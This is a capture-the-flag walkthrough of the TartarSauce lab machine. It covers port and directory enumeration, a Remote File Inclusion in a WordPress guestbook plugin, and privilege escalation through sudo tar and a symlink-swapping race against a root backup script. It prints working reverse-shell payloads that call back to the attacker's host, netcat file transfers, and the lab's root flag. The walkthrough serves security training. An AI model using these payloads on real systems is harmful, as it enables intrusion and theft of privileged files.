TartarSauce

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and find out the services and versions running on those ports.
The following nmap command will quickly scan the target machine for open ports and save the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.88 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Thu Jun 30 12:06:58 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.88
Nmap scan report for 10.10.10.88
Host is up (0.074s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
# Nmap done at Thu Jun 30 12:07:12 2022 -- 1 IP address (1 host up) scanned in 14.08 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command will scan the port in more depth and save the result into a file:
nmap -sC -sV -p80 10.10.10.88 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Thu Jun 30 12:07:25 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.88
Nmap scan report for 10.10.10.88
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-title: Landing Page
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 30 12:07:35 2022 -- 1 IP address (1 host up) scanned in 10.17 seconds
Let's take a look at the website.

Not much going on. As we saw in the nmap scan, there is a robots.txt file; let's take a look at it.

We see a bunch of subdirectories of the /webservices directory. Let's try to fuzz directories with gobuster.
gobuster dir -u http://10.10.10.88/webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
dir: enumerates directories or files.
-u: the target URL.
-w: path to the wordlist.
-t: number of concurrent threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.88/webservices
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/01 00:23:40 Starting gobuster in directory enumeration mode
===============================================================
/wp (Status: 301) [Size: 319] [--> http://10.10.10.88/webservices/wp/]
===============================================================
2022/07/01 00:24:34 Finished
===============================================================
Let's take a look at the /webservices/wp directory.

As we can see, it looks pretty awful. If we take a look at the source code, we'll see that the website is trying to load resources from tartarsauce.htb. Let's add the domain name to the /etc/hosts file.

nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.88 tartarsauce.htb
Now it should look a bit better.

As the website runs the WordPress CMS, I tried to enumerate WordPress plugins with gobuster.
gobuster dir -u http://10.10.10.88/webservices/wp -w /usr/share/SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt -t 200
dir: enumerates directories or files.
-u: the target URL.
-w: path to the wordlist.
-t: number of concurrent threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.88/webservices/wp
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/01 00:54:13 Starting gobuster in directory enumeration mode
===============================================================
/wp-content/plugins/akismet/ (Status: 200) [Size: 0]
/wp-content/plugins/gwolle-gb/ (Status: 200) [Size: 0]
/wp-content/plugins/hello.php (Status: 500) [Size: 0]
/wp-content/plugins/hello.php/ (Status: 500) [Size: 0]
===============================================================
2022/07/01 00:54:21 Finished
===============================================================
There is the gwolle-gb plugin. Let's search for common vulnerabilities associated with that plugin.
searchsploit gwolle
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | php/webapps/38861.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
As we can see, there is one Remote File Inclusion vulnerability that we can exploit.
If we take a look at the exploit, we'll see that if we set the abspath parameter to our HTTP server, the plugin will try to load a file called wp-load.php from it. So if we create a malicious file with that name that sends us a reverse shell, and then point the abspath parameter at our HTTP server, the file will be executed and we'll get a reverse shell.
nano wp-load.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'"); ?>
Now, let's set up a simple HTTP server with Python on port 80.
python -m http.server 80
Then, let's set up a netcat listener on port 4444.
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
Finally, if we make a request to the following URL, the wp-load.php file should be executed, and we should get the reverse shell as the www-data user.
curl 'http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.8/'
❯ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.88] 43662
bash: cannot set terminal process group (1357): Inappropriate ioctl for device
bash: no job control in this shell
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ whoami
whoami
www-data
Privilege Escalation
First, let's spawn an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z
and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command on my local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If we list the sudo privileges of the www-data user, we'll see that we can execute tar as the onuma user.
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
On the GTFOBins site, we can see a way of getting a shell as the onuma user.
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
<null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
whoami
onuma
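The checkpoint trick is easy to verify locally. The following is a minimal, harmless sketch of the same GTFOBins technique, swapping /bin/bash for an echo so you can watch the checkpoint action fire:

```shell
# GNU tar runs the --checkpoint-action command whenever a checkpoint is
# reached; with --checkpoint=1 that happens almost immediately, so the
# command executes even for a trivial archive of /dev/null.
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='echo checkpoint hit'
```

Since tar runs here under sudo -u onuma, the exec'd command inherits that user, which is why the one-liner above drops us into a shell as onuma.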
To get a more interactive shell, let's set up another netcat listener on port 4444.
nc -lvnp 4444
And send another reverse shell as the onuma user.
bash -i >& /dev/tcp/10.10.14.8/4444 0>&1
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.88] 43664
bash: cannot set terminal process group (1357): Inappropriate ioctl for device
bash: no job control in this shell
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ whoami
whoami
onuma
Now, let's set up an interactive TTY shell the same way as before. Once we have an interactive TTY, we can check for scheduled tasks with the pspy tool. Let's transfer the 32-bit version to the machine, into the /tmp directory.
cd /tmp
nc -lvnp 5555 > pspy32
On our local machine.
nc 10.10.10.88 5555 < pspy32
Then, give the binary execution permissions.
chmod +x pspy32
And finally execute it.
./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
***
2022/06/30 19:37:15 CMD: UID=0 PID=25632 | /bin/bash /usr/sbin/backuperer
***
We can see that root is executing the /usr/sbin/backuperer file. Let's take a look at it.
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
Basically, the script compresses the /var/www/html directory and stores the archive in the /var/tmp directory. It then waits 30 seconds and extracts the archive into the /var/tmp/check directory. Finally, it compares the original /var/www/html with the copy it just extracted; if there are any differences, it writes them to the /var/backups/onuma_backup_error.txt file. The idea here is to compress the /var/www/html directory into a compressed.tar file.
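The reason this leaks the flag is the diff -r inside integrity_chk: it runs as root and follows symlinks, printing both sides of any difference. A minimal local sketch of that behavior (directory and file names here are made up for illustration):

```shell
# "orig" stands in for /var/www/html, "check" for the extracted backup
# containing a planted symlink, "secret.txt" for /root/root.txt.
mkdir -p orig check
echo 'real page' > orig/index.html
echo 'SECRET-FLAG' > secret.txt
ln -s "$PWD/secret.txt" check/index.html   # the planted symlink
# diff follows the symlink and prints the secret's contents as part of
# the difference ("|| true" because diff exits 1 when files differ).
diff -r orig check || true
```

On the target, root performs this diff for us and appends the output to onuma_backup_error.txt, which www-data can read.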
tar -zcvf compressed.tar /var/www/html/
-z: filter the archive through gzip.
-c: create a new archive.
-v: verbose mode.
-f: use the given archive file.
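Note that tar stores absolute paths without the leading slash ("Removing leading `/' from member names"), so the archive's members are relative; that's why the later steps reference var/www/html rather than /var/www/html. A quick local check (the scratch paths are made up):

```shell
# Build a throwaway tree and archive it by absolute path.
mkdir -p demo/var/www/html
echo 'hi' > demo/var/www/html/index.html
# tar warns on stderr that it removes the leading '/'.
tar -zcf demo.tar.gz "$PWD/demo/var/www/html" 2>/dev/null
# The stored member names therefore have no leading slash:
tar -tzf demo.tar.gz
```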
Then, send the file to our local machine.
nc -lvnp 5555 > compressed.tar
On the victim machine.
nc 10.10.10.88 5555 < compressed.tar
Then extract the archive on the local machine; tar stored the member name without the leading slash, so we reference it as var/www/html/.
tar -zxvf compressed.tar var/www/html/
-z: filter the archive through gzip.
-x: extract files from the archive.
-v: verbose mode.
-f: use the given archive file.
And then, make a symbolic link from var/www/html/index.html to /root/root.txt, so we can see the root flag.
ln -s -f /root/root.txt var/www/html/index.html
-s: make a symbolic link.
-f: force, removing any existing destination file.
And then compress the var/www/html directory again into the compressed-mod.tar file.
tar -zcvf compressed-mod.tar var/www/html/
And transfer it to the victim machine.
nc -lvnp 5555 > compressed-mod.tar
On our local machine.
nc 10.10.10.88 5555 < compressed-mod.tar
Finally, I made this bash script, which detects when the temporary compressed file is created and replaces it with the one we just made.
#!/bin/bash
function ctrl_c(){
    echo -e "\nQuitting ..."
    exit 1
}
# Ctrl+C
trap ctrl_c INT
while true; do
    filename="$(ls -la /var/tmp/ | grep -oP '\.\w{40}')"
    if [ "$filename" ]; then
        echo -e "\nFile $filename detected"
        rm -f /var/tmp/$filename
        cp /tmp/compressed-mod.tar /var/tmp/$filename
        echo -e "\nDone!"
        exit 0
    fi
done
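The grep -oP '\.\w{40}' in the loop matches backuperer's temporary file name, which is a dot followed by a 40-character SHA-1 hex digest. A quick sanity check of that naming scheme, reproduced from the backup script:

```shell
# Reproduce the tmpfile naming used by backuperer:
# a dot plus the SHA-1 of 100 random bytes (40 hex characters).
name=".$(head -c100 /dev/urandom | sha1sum | cut -d' ' -f1)"
echo "$name"
```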
Now, let's execute it.
chmod +x exploit.sh
./exploit.sh
File .23d8e3660af1e9173d055e4847724cb7e2ac3f51 detected
Done!
Now, all we have to do is read the /var/backups/onuma_backup_error.txt file, reap the harvest, and take the root flag.
> d349f8d21a1a6d0c6df352551adf2bc1